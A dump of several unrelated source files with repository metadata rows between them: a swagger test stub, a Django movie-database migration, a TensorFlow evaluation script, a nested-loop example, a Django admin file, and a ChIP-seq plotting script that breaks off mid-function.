OpenAPI spec version: v1
Contact: support@fit2cloud.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.remote_app_permission_update_user import RemoteAppPermissionUpdateUser # noqa: E501
from swagger_client.rest import ApiException
class TestRemoteAppPermissionUpdateUser(unittest.TestCase):
"""RemoteAppPermissionUpdateUser unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testRemoteAppPermissionUpdateUser(self):
"""Test RemoteAppPermissionUpdateUser"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.remote_app_permission_update_user.RemoteAppPermissionUpdateUser() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"ibuler@qq.com"
] | ibuler@qq.com |
206496e68457d695272df25a30ed14016edc1773 | 974e10010df9a2f0696a021f6858be409848ea16 | /douban/movie/migrations/0001_initial.py | 85e0cf3e109a69a5ef364d256cbad9d39d627a30 | [] | no_license | ssn9400/tango_with_django | ed7e4cb489e50dcd104129dfbf001cb27a482139 | 73bf7cf59af97873e03a077508694234c92f6786 | refs/heads/master | 2020-09-18T19:30:18.537014 | 2019-11-26T11:53:43 | 2019-11-26T11:53:43 | 224,176,505 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,142 | py | # Generated by Django 2.1.14 on 2019-11-26 06:20
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AuthGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
],
options={
'db_table': 'auth_group',
'managed': False,
},
),
migrations.CreateModel(
name='AuthGroupPermissions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_group_permissions',
'managed': False,
},
),
migrations.CreateModel(
name='AuthPermission',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('codename', models.CharField(max_length=100)),
],
options={
'db_table': 'auth_permission',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128)),
('last_login', models.DateTimeField(blank=True, null=True)),
('is_superuser', models.BooleanField()),
('username', models.CharField(max_length=150, unique=True)),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=150)),
('email', models.CharField(max_length=254)),
('is_staff', models.BooleanField()),
('is_active', models.BooleanField()),
('date_joined', models.DateTimeField()),
],
options={
'db_table': 'auth_user',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserGroups',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_groups',
'managed': False,
},
),
migrations.CreateModel(
name='AuthUserUserPermissions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'auth_user_user_permissions',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoAdminLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('action_time', models.DateTimeField()),
('object_id', models.TextField(blank=True, null=True)),
('object_repr', models.CharField(max_length=200)),
('action_flag', models.SmallIntegerField()),
('change_message', models.TextField()),
],
options={
'db_table': 'django_admin_log',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoContentType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app_label', models.CharField(max_length=100)),
('model', models.CharField(max_length=100)),
],
options={
'db_table': 'django_content_type',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoMigrations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('app', models.CharField(max_length=255)),
('name', models.CharField(max_length=255)),
('applied', models.DateTimeField()),
],
options={
'db_table': 'django_migrations',
'managed': False,
},
),
migrations.CreateModel(
name='DjangoSession',
fields=[
('session_key', models.CharField(max_length=40, primary_key=True, serialize=False)),
('session_data', models.TextField()),
('expire_date', models.DateTimeField()),
],
options={
'db_table': 'django_session',
'managed': False,
},
),
migrations.CreateModel(
name='Actor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('actor', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'actor',
'managed': True,
},
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'country',
'managed': True,
},
),
migrations.CreateModel(
name='Director',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('director', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'director',
'managed': True,
},
),
migrations.CreateModel(
name='Editor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('editor', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'editor',
'managed': True,
},
),
migrations.CreateModel(
name='Kind',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('kind', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'kind',
'managed': True,
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('language', models.CharField(max_length=255)),
('movie_name', models.CharField(max_length=255)),
],
options={
'db_table': 'language',
'managed': True,
},
),
migrations.CreateModel(
name='Movie',
fields=[
('movie_name', models.CharField(max_length=255, primary_key=True, serialize=False)),
('director', models.CharField(blank=True, max_length=255, null=True)),
('editor', models.CharField(blank=True, max_length=255, null=True)),
('actor', models.CharField(blank=True, max_length=255, null=True)),
('kind', models.CharField(blank=True, max_length=255, null=True)),
('country', models.CharField(blank=True, max_length=255, null=True)),
('language', models.CharField(blank=True, max_length=255, null=True)),
('release_date', models.CharField(blank=True, max_length=255, null=True)),
('runtime', models.CharField(blank=True, max_length=255, null=True)),
('nickname', models.CharField(blank=True, max_length=255, null=True)),
('imdb', models.CharField(blank=True, db_column='IMDb', max_length=255, null=True)),
('rating_num', models.FloatField(blank=True, null=True)),
('votes', models.FloatField(blank=True, null=True)),
],
options={
'db_table': 'movie',
'managed': True,
},
),
migrations.CreateModel(
name='movieinfo',
fields=[
('movie_name', models.CharField(max_length=255, primary_key=True, serialize=False)),
('release_date', models.CharField(blank=True, max_length=255, null=True)),
('runtime', models.CharField(blank=True, max_length=255, null=True)),
('nickname', models.CharField(blank=True, max_length=255, null=True)),
('imdb', models.CharField(blank=True, db_column='IMDb', max_length=255, null=True)),
('rating_num', models.FloatField(blank=True, null=True)),
('votes', models.FloatField(blank=True, null=True)),
],
options={
'db_table': 'movieinfo',
'managed': True,
},
),
]
| [
"940091548@qq.com"
] | 940091548@qq.com |
2fafa7209aecd8c1e4b79ff259093980bd081564 | b9a73fe404ee30baf8a88276030363ad2d1d4cc5 | /old/BRNN_Gap/eval.py | d8cfef3415e874b7220fbd604a5df6822553a2ff | [] | no_license | everglowing/Language-Models | 06da6befceef9b4fd1f43ba7d6708fcf8862f715 | 67db3fc5d0b0ef099cac306bd78294764d3587cf | refs/heads/master | 2021-01-13T04:12:41.341299 | 2016-12-27T18:53:24 | 2016-12-27T18:53:24 | 77,684,222 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | from __future__ import print_function
import numpy as np
import tensorflow as tf
import argparse
import codecs
import time
import os
from six.moves import cPickle
from utils import TextLoader
from model import Model
from six import text_type
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--save_dir', type=str, default='save',
help='model directory to store checkpointed models')
parser.add_argument('--text', type=str,
help='filename of text to evaluate on')
args = parser.parse_args()
eval(args)
def eval(args):
with open(os.path.join(args.save_dir, 'config.pkl'), 'rb') as f:
saved_args = cPickle.load(f)
saved_args.batch_size = 1
saved_args.seq_length = 200
with open(os.path.join(args.save_dir, 'chars_vocab.pkl'), 'rb') as f:
chars, vocab = cPickle.load(f)
model = Model(saved_args, infer=False, evaluation=True)
with codecs.open(args.text, 'r', encoding='utf-8') as f:
text = f.read()
with tf.Session() as sess:
tf.initialize_all_variables().run()
saver = tf.train.Saver(tf.all_variables())
ckpt = tf.train.get_checkpoint_state(args.save_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
ppl = model.eval(sess, chars, vocab, text)
print('perplexity: {0}'.format(ppl))
if __name__ == '__main__':
main()
| [
"kalpeshk2011@gmail.com"
] | kalpeshk2011@gmail.com |
cedcb016825d6154f200e7ccfe1d53847c674bb6 | 9512f329d9326ed0b9436202947de9eee0c6c387 | /Cap07-estruturas_de_repeticao/for_03.py | dcfe65ac3989ce9551d9ca9f6b3a0ccdf9f82056 | [] | no_license | frclasso/CodeGurus_Python_mod1-turma1_2019 | 9fffd76547256ac480db41536223682a5b152944 | e34d60498ee45566dbf1182551d91250a9aab272 | refs/heads/master | 2020-04-30T02:01:50.757611 | 2019-06-10T15:38:58 | 2019-06-10T15:38:58 | 176,546,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # loop aninhado
lot_2D = [
['Toyota', 'Audi', 'BMW'],
['Lexus', 'Jeep'],
['Honda', 'Kia', 'Mazda']
]
#print(lot_2D[0][0]) # lista 0 , elemento 0 da lista 0
# for linha in lot_2D:
# for carro in linha:
# print(carro)
lot_3D =[
[
['Tesla', 'Fiat', 'BMW'],
['Honda', 'Jeep'],
['Saab','Kia', 'Ford']
],
[
['Subaru', 'Nissan'],
['Volkswagen'],
['Mercedez']
],
[
['Chevrolet', 'GMC'],
['Ferrari', 'Lamborghini']
]
]
#print(lot_3D[0])
# print(lot_3D[0][0])
#print(lot_3D[0][0][1])
for grupo in lot_3D:
for line in grupo:
for carro in line:
print(carro) | [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
d79a6922f9637b01f6fde1a85cd15c4482f4ecc7 | 7da9f5979aaaadd44f9420fbd49653683b3d2ce8 | /ablog/theblog/admin.py | a711da020883ca654ea31ed754d3e24b1939145b | [] | no_license | SanjoyPator1/BlogProjectDjango | 7bde566098b249cfa073cab62e69dcb3f5a8954a | f4ea7a5fa0b4ba10b3a6657c553720ce8ffe22c8 | refs/heads/main | 2023-07-13T19:10:55.157433 | 2021-08-28T10:02:03 | 2021-08-28T10:02:03 | 391,609,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | from django.contrib import admin
from .models import Post, Category, Privacy
from django_summernote.admin import SummernoteModelAdmin
#summernote
class PostAdmin(SummernoteModelAdmin):
summernote_fields = ('body',)
# Register your models here.
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Privacy)
| [
"sanjoy18-378@aec.ac.in"
] | sanjoy18-378@aec.ac.in |
2b7ca6930d7a261e1163001b2f4c95bfa52cba9d | 87ea41eb5df699439196eefb92501b2db5ffde08 | /func_2.py | 8024b9dbe5f72a1c01efc1261dcc2e46113de7c8 | [] | no_license | Marco-Colombi/Homework-5-ADM | aea42c18a737ad179e0986aed371691b05ed6e94 | 4c8123be9a94e1459e00967a54ce9f504f2c18d3 | refs/heads/master | 2020-11-27T22:16:41.344710 | 2019-12-22T22:57:50 | 2019-12-22T22:57:50 | 229,623,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,048 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Dec 21 04:41:45 2019
@author: marco
"""
#imports
import gzip
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
import math
from bitarray import bitarray
import pandas as pd
import heapq
import time
import sys
import networkx as nx
sys.setrecursionlimit(100000)
from collections import defaultdict
def make_set(vertice,parent,rank):
parent[vertice] = vertice
rank[vertice] = 0
# A utility function to find set of an element i
# (uses path compression technique)
def find(parent, i):
if parent[i] == i:
return i
return find(parent, parent[i])
# A function that does union of two sets of x and y
# (uses union by rank)
def union( parent, rank, x, y):
xroot = find(parent, x)
yroot = find(parent, y)
# Attach smaller rank tree under root of high rank tree
# (Union by Rank)
if rank[xroot] < rank[yroot]:
parent[xroot] = yroot
elif rank[xroot] > rank[yroot]:
parent[yroot] = xroot
#If ranks are same, then make one as root and increment
# its rank by one
else :
parent[yroot] = xroot
rank[xroot] += 1
# The main function to construct MST using Kruskal's algorithm
def KruskalMST(verts,edges):
verts = [int(x) for x in verts]
verts.sort()
edges = sorted(edges,key=lambda item: item[2])
minimum_spanning_tree = []
#Step 1: Sort all the edges in non-decreasing order of their
# weight. If we are not allowed to change the given graph, we
# can create a copy of graph
#print self.graph
parent = [0]*(len(verts)+1);
rank = [0]*(len(verts)+1);
for i in range(len(verts)):
make_set(i,parent,rank)
#edges = sorted(dist_file,key=lambda item: item[2])
for edge in edges:
vertice1, vertice2,weight = edge
if find(parent,verts.index(vertice1)) != find(parent,verts.index(vertice2)):
union(parent,rank,verts.index(vertice1),verts.index(vertice2) )
minimum_spanning_tree.append(edge)
return minimum_spanning_tree
def new_graph(nodes):
#this function create the new graph with the considered nodes
red_g = []
nodes = [str(x) for x in nodes]
for n1 in nodes:
list_of_nodes = [a.id for a in list(g.getVertex(n1).getConnections())]
for i in range(len(list_of_nodes)):
if list_of_nodes[i] in nodes:
new_edge = [n1, list_of_nodes[i], list((g.getVertex(n1).connectedTo).values())[i]]
red_g.append(new_edge)
red_g = [[int(x) for x in lis] for lis in red_g ]
#visualization
G = nx.Graph()
for link in red_g:
G.add_edge(str(link[0]), str(link[1]), weight=link[2])
elarge = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] > 0.5]
esmall = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] <= 0.5]
pos = nx.spring_layout(G) # positions for all nodes
# nodes
nx.draw_networkx_nodes(G, pos, node_size=700)
# edges
nx.draw_networkx_edges(G, pos, edgelist=elarge,
width=6)
nx.draw_networkx_edges(G, pos, edgelist=esmall,
width=6, alpha=0.5, edge_color='b', style='dashed')
# labels
nx.draw_networkx_labels(G, pos, font_size=20, font_family='sans-serif')
plt.axis('off')
plt.show()
#Kruskal works both on connected and not connected graph
#in this case we analize the results of an input of nodes and an out that can be a connected graph
#so roads which connect all the cities passing just in those cities
#and the case where there can't be a connection through the cities using just those cities
def Function_2(g):
inp=input('Give me a set of nodes (separated by space): ')
nodes=list(map(int, inp.split()))
return KruskalMST(nodes,g)
| [
"noreply@github.com"
] | Marco-Colombi.noreply@github.com |
e5999b065f6134eacca7b4e84558088fb2db9b8a | 767831c642b7f9c4e49d7125bd3add1ce558a49a | /html_tags/details.py | 97fcacf4e8baf127aa16f99d4c7623a252d6e625 | [] | no_license | taka16a23/.pylib | 158152169b23677ccb06f481438995a1cd18bae6 | cf702edb085b76657893daff24f4c6f349424840 | refs/heads/master | 2021-01-19T10:06:11.500989 | 2020-07-26T11:17:16 | 2020-07-26T11:17:16 | 82,158,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,664 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
r"""ditails -- ditails tag
"""
from .html_tag import HtmlTag
class Details(HtmlTag):
"""Details
Details is a HtmlTag.
Responsibility:
HTML の詳細折りたたみ要素 (<details>) は、ウィジェットが
open 状態になった時のみ情報が表示される折りたたみウィジェットを作成します。
概要やラベルは <summary> 要素を使用して提供することができます。
折りたたみウィジェットはふつう、回転して開閉状態を示す小さな三角形を使用し、
その隣のラベルと共に画面上に表現されます。
<details> 要素の最初の子要素が <summary> の場合は、
<summary> 要素が折りたたみウィジェットのラベルとして使用されます。
HTML の詳細折りたたみ要素 (<details>) は、ウィジェットが open
状態になった時のみ情報が表示される折りたたみウィジェットを作成します。
概要やラベルは <summary> 要素を使用して提供することができます。
折りたたみウィジェットはふつう、回転して開閉状態を示す小さな三角形を使用し、
その隣のラベルと共に画面上に表現されます。
<details> 要素の最初の子要素が <summary> の場合は、
<summary> 要素が折りたたみウィジェットのラベルとして使用されます。
"""
class AttributeNames(HtmlTag.AttributeNames):
"""AttributeNames
AttributeNames is a HtmlTag.AttributeNames.
Responsibility:
open
この論理属性は、ページ読み込み時に詳細内容、
つまり <details> 要素の内容が表示されるよう指定するものです。
既定値は false であり、詳細内容は表示しません。
イベント
HTML で対応している通常のイベントに加えて、 <details> 要素は toggle イベントに対応しており、開閉状態が変化するたびに <details> 要素が呼び出されます。イベントは状態が変化した後に送信され、もしブラウザーがイベントを送信する前に状態が2回以上変化しても、イベントは合体して1回しか送信されません。
ウィジェットの状態が変化したことを検出するために、 toggle イベントをリスンすることができます。
details.addEventListener("toggle", event => {
if (details.open) {
/* 要素が開いた方に切り替わった */
} else {
/* 要素が閉じた方に切り替わった */
}
});
"""
OPEN = 'open'
def __init__(self, tags=[], attrs=None, **kwargs):
super(HtmlTag, self).__init__(name='details', tags=[], attrs=None, **kwargs)
def enable_open(self, ):
"""Enable open.
enable_open()
@Return: this instance
@Error:
"""
return self._set_one_attribute(self.AttributeNames.OPEN, '')
def disable_open(self, ):
"""Disable open.
disable_open()
@Return: this instance
@Error:
"""
if self.AttributeNames.OPEN in self.attrs:
del self.attrs[self.AttributeNames.OPEN]
return self
def is_open(self, ):
"""Check open enabled.
is_open()
@Return: this instance
@Error:
"""
return self.AttributeNames.OPEn in self.attrs
# For Emacs
# Local Variables:
# coding: utf-8
# End:
# ditails.py ends here
| [
"takahiroatsumi0517@gmail.com"
] | takahiroatsumi0517@gmail.com |
c5ec5ec31bab15d0c60b675bc1ebd8dbec63bfda | ab3c29601d3d2990f07ef57f1d0d46c15683fe15 | /users/views.py | 7d872c07c59e9de7534fd74d919d59123b881b93 | [] | no_license | ErikPrestegaard/omegaCheckList | bddca0aa93b901503e38b0dd3a07fa1c9790f061 | b7df96f8bdf3031cb50d1417089286de03d45592 | refs/heads/main | 2023-05-03T03:12:40.671438 | 2021-05-28T13:54:13 | 2021-05-28T13:54:13 | 371,712,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,471 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
messages.success(request, f'Your account has been created! You are now able to log in')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance = request.user)
p_form = ProfileUpdateForm(instance = request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form
}
return render(request, 'users/profile.html', context) | [
"84975138+ErikPrestegaard@users.noreply.github.com"
] | 84975138+ErikPrestegaard@users.noreply.github.com |
eda76db32eff1c8ef1830ed0c214425cd7c60031 | fc0201220fa4d73c7e68289a80e096fb4215bc3d | /examples/example.py | b16169de66115206906a055a167fc758996e092a | [] | no_license | ACCarnall/loch_nest_monster | b1e817a60f1afa37ca0c65af056b169e8498cc29 | 166784bfc81f15d1af52fc19124c7d43be2f9b8a | refs/heads/master | 2020-03-15T18:52:31.849544 | 2018-09-03T10:16:17 | 2018-09-03T10:16:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,393 | py | import numpy as np
import matplotlib.pyplot as plt
import corner
import lochnest_monster as nesty
def lnprob(param):
y_model = make_fake_data_linear(x, param)
return -0.5*np.sum(((y - y_model)/y_err)**2)
def prior_transform(cube):
return 20.*cube-10.
def make_fake_data_linear(x, param, sigma=None):
m = param[0]
c = param[1]
y = m*x + c
if sigma:
#y += sigma*np.random.randn(x.shape[0])
y_err = np.zeros_like(x) + sigma
return y, y_err
return y
# Make some fake straight line data to fit
x = np.arange(0., 20., 2.)
true_param = [1.5, 5.] # Gradient, intercept
y, y_err = make_fake_data_linear(x, true_param, 1.0)
# Make a plot of the fake data
plt.figure()
plt.errorbar(x, y, yerr=y_err, lw=1.0, linestyle=" ",
capsize=3, capthick=1, color="black")
plt.scatter(x, y, color="blue", s=25, zorder=4, linewidth=1,
facecolor="blue", edgecolor="black")
plt.show()
# Set up the sampler and sample the posterior
sampler = nesty.ellipsoid_sampler(lnprob, prior_transform, len(true_param),
verbose=True, live_plot=False, n_live=400)
# Try out the nball_sampler and box_sampler,
# also try setting live_plot to True.
sampler.run()
# Make a corner plot of the results
corner.corner(sampler.results["samples_eq"])
plt.savefig("example_corner.pdf", bbox_inches="tight")
| [
"adamc@roe.ac.uk"
] | adamc@roe.ac.uk |
16567c239a0a382783d26d63095c22e8dbed7ee5 | 2534d5d9ce1872fa1408224cf889c67c3962bbe0 | /images/migrations/0003_alter_images_image.py | 571c3e6bb5343984cb953a06da1d4e47d19c5012 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | samwel-chege/Personal-Gallery | 561ac8ef864eccc469f514676637c6179fdda428 | b14af9d9cbea42f567d819144a6b87d533d39582 | refs/heads/master | 2023-08-30T00:28:03.157266 | 2021-11-08T06:26:29 | 2021-11-08T06:26:29 | 402,773,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # Generated by Django 3.2.7 on 2021-09-04 12:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('images', '0002_auto_20210904_1535'),
]
operations = [
migrations.AlterField(
model_name='images',
name='image',
field=models.ImageField(default='no photo', upload_to='photos'),
),
]
| [
"samwelchegeh09@gmail.com"
] | samwelchegeh09@gmail.com |
2cf468316ab01bf734e453e3ec7c8f84257c7636 | d7b6f3ea6a1f58c2d716a3ba2b922d32dfba3dd5 | /main.py | 328dd1b8c4e28dedd09fc7023776d19a41ca3929 | [] | no_license | rtislacktest/files | 0889fc31c43945400b7b3defe427b16ef134144b | b0558a20c741682fb9208d3db17fd6b522e95b9f | refs/heads/master | 2022-12-03T15:00:25.455812 | 2020-08-19T14:49:18 | 2020-08-19T14:49:18 | 288,362,819 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,105 | py | import os
import SlackPostRequests as slack_api
SLACK_BOT_TOKEN = os.environ['SLACK_BOT_TOKEN']
PATH_TO_FILES = os.environ['PATH_TO_FILES']
START_CHANNEL = os.environ['START_CHANNEL']
if __name__ == '__main__':
#Тест отправки сообщения
r_msg = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_POST_MESSAGE,
channel = START_CHANNEL,
text = 'slack bot test')
print(f'r_msg: {r_msg}')
# Тест редактирования сообщения
r_upd = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_CHAT_UPD_MSG,
channel = r_msg["channel"],
ts = r_msg["ts"],
text = 'Слак бот тест')
print(f'r_upd: {r_upd}')
# Тест добавления эмоций в сообщения
r_radd = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_REACTION_ADD,
channel = r_msg["channel"],
timestamp = r_msg["ts"],
name = 'grin')
print(f'r_rad: {r_radd}')
# Тест удаления эмоций в сообщения
r_rdel = slack_api.post_to_slack(SLACK_BOT_TOKEN,
slack_api.URL_REACTION_DEL,
channel = r_msg["channel"],
timestamp = r_msg["ts"],
name = 'grin')
print(f'r_rad: {r_rdel}')
# Тест загрузки файла в сообщения
r_file = slack_api.upload_file_to_slack(SLACK_BOT_TOKEN,
r'{0}TEST.png'.format(PATH_TO_FILES),
channels = [r_msg["channel"]])
print(f'r_file: {r_file}')
| [
"noreply@github.com"
] | rtislacktest.noreply@github.com |
5ea3abe3100127da5d59957fa8e7d512baa17b7f | 9a7b7f90aa62ce52643e2df83d8aef7ba7803afd | /src/input_handlers/inventory_drop_handler.py | f467da4003f1c32e9ad309fed15c3b0a08d53594 | [] | no_license | voidnologo/tcod_roguelike | d82a060a94784a18156fefe105a3e26a540525e9 | 23d806f960134c17ccbd4e6ca5527f35e654df65 | refs/heads/main | 2023-02-28T11:05:52.809161 | 2021-02-07T16:36:38 | 2021-02-07T16:36:38 | 331,168,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import actions
from input_handlers.inventory_event_handler import InventoryEventHandler
class InventoryDropHandler(InventoryEventHandler):
"""
Handle dropping an inventory item
"""
TITLE = 'Select an item to drop'
def on_item_selected(self, item):
return actions.DropItemAction(self.engine.player, item)
| [
"(none)"
] | (none) |
6064a1d68a73eba25dce46779f0fae12a18e53cf | 20b6c8841b14d30d00f3520e8dd212cc9200ab8f | /items.py | 5331947bf197cd1c17a1f2266d092aac5d6d8911 | [] | no_license | kdurek/tryga | 6a25f86cbb7e8d880437290877995f5f97731131 | 1dc9292c108ccc22878e0c159ef52f8d33030ed7 | refs/heads/master | 2022-05-12T16:18:48.538808 | 2020-02-26T22:54:08 | 2020-02-26T22:54:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | class Weapon:
def __init__(self, name, damage, description):
self.name = name
self.damage = damage
self.description = description
| [
"noreply@github.com"
] | kdurek.noreply@github.com |
df7015dc6cede234e2a5bec11f386fb53a89c388 | e1b6911e90e8f8636066f6566377f1e57385b1b8 | /components/GetStatistics/GetStatistics.py~ | 263ddf273c6b6c3de2fa0d126f1b61fac5b569b1 | [] | no_license | severinb/ChIPseq-pipeline | 6ab3f228c4004970e1aaa41dcef49cba89226c11 | 3ff11ce3bcd91a8ffabb6043a2d62209e9a5b852 | refs/heads/master | 2021-01-15T19:12:51.675353 | 2014-10-13T10:05:31 | 2014-10-13T10:05:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,136 | #!/usr/bin/env python
import component_skeleton.main
import subprocess
import os, re
from string import *
import datetime, time
from pylab import *
from scipy.stats import gaussian_kde
import sys
def make_boxplot(xarr, yarr, binnum, outplot, xlab, ylab, plabel=None):
#make box plots of posterior distributions stratified by height
binedges = linspace(min(array(xarr)), max(array(xarr)), binnum)
datamatrix = [[] for i in binedges]
for i in arange(len(yarr)):
yval = yarr[i]
xval = xarr[i]
index = where(binedges <= xval)[0][-1] #include smaller edge into bin
datamatrix[index].append(yval)
# print '-------------------'
# print binedges
#create violin plots on an axis
figure()
bp = True
violin = True
dist = max(binedges)-min(binedges)
w = (1.0/(2*binnum))*dist
if violin:
for d,p in zip(datamatrix, map(float, [mean([binedges[i], binedges[i+1]]) for i in arange(len(binedges) - 1)])):
if len(d) <= 1 or sum(d) == 0: #gaussian_kde function doesn't accept one value lists and empty lists
continue
try:
k = gaussian_kde(d) #calculates the kernel density
m = k.dataset.min() #lower bound of violin
M = k.dataset.max() #upper bound of violin
x = arange(m,M,(M-m)/100.) # support for violin
## this doesn't work as it should. Box plots and violins get somehow shifted relatively to each other.
# #try to not plot outliers (more than 3 standard deviations away from mode):
# kdemode = k.evaluate(x).max()
# kdestd = sqrt(k.dataset.var())
# m1 = max(kdemode - 3*kdestd, m)
# M1 = min(kdemode + 3*kdestd, M)
# x = arange(m1,M1,(M1-m1)/100.)
v = k.evaluate(x) #violin profile (density curve)
v = v/v.max()*w #scaling the violin to the available space
fill_betweenx(x,p,v+p,facecolor='y',alpha=0.3)
fill_betweenx(x,p,-v+p,facecolor='y',alpha=0.3)
except Exception:
print d, p, 'Couldn\'t make a violin plot'
if bp:
boxplot(datamatrix, positions=map(float, [round(mean([binedges[i], binedges[i+1]]), 2) for i in arange(len(binedges) -1)]), widths = w, sym='')
xlim([min(binedges), max(binedges)])
xticks(rotation=30)
xlabel(xlab)
ylabel(ylab)
if plabel:
title(plabel)
savefig(outplot)
savefig(outplot.rstrip('.pdf'))
close()
def plotTFBSdist(peakstats, TFBSstats, region_dict, minpost, histplot, scatterplot):
"""
This function plots a histogram of the distance of a peak to it's nearest TFBS
"""
peakDict = {} #peakid: peakcenter (mu)
for line in open(peakstats):
if line.startswith('#'):
continue
else:
t = line.split()
center = mean([int(t[2]),int(t[1])])
peakid = t[3]
peakDict[peakid] = center
#TFBSstats:
##chrom start end peakID distance posterior TFBS_coverage
TFBSdict = {}
postDict = {}
for line in open(TFBSstats):
if line.startswith('#'):
continue
else:
t = line.split()
center = mean([int(t[2]),int(t[1])])
regionid = t[3].split('.')[0]
if float(t[5]) >= minpost: #only take TFBSs into account that are above minpost and thus assumed to be real
try:
TFBSdict[regionid].append(center)
postDict[regionid].append(float(t[5]))
except KeyError:
TFBSdict[regionid] = [center]
postDict[regionid] = [float(t[5])]
dists = []
posts = []
# shuffle site positions and then take the nearest. I am doing this to get a background distribution
shuffled_dists = []
shuffled_posts = []
noTFBS = 0
sample_size = 1000
for peakid in peakDict:
regionid = peakid.split('.')[0]
try:
sites = array(TFBSdict[regionid])
site_posts = array(postDict[regionid])
except KeyError:
noTFBS += 1
continue
sites -= peakDict[peakid] #subtract peak center from site position
idx = argmin(abs(sites))
dists.append(sites[idx])
posts.append(site_posts[idx])
# do shuffling sample_size times
region_coords = region_dict[regionid]
n = len(sites)
shuffled_sites = randint(region_coords[0], region_coords[1], (sample_size, n))
shuffled_sites -= peakDict[peakid]
idxs = abs(shuffled_sites).argmin(axis=1)
for i, idx in enumerate(idxs):
shuffled_dists.append(shuffled_sites[i, idx])
shuffled_posts.append(site_posts[idx])
if len(dists) != 0:
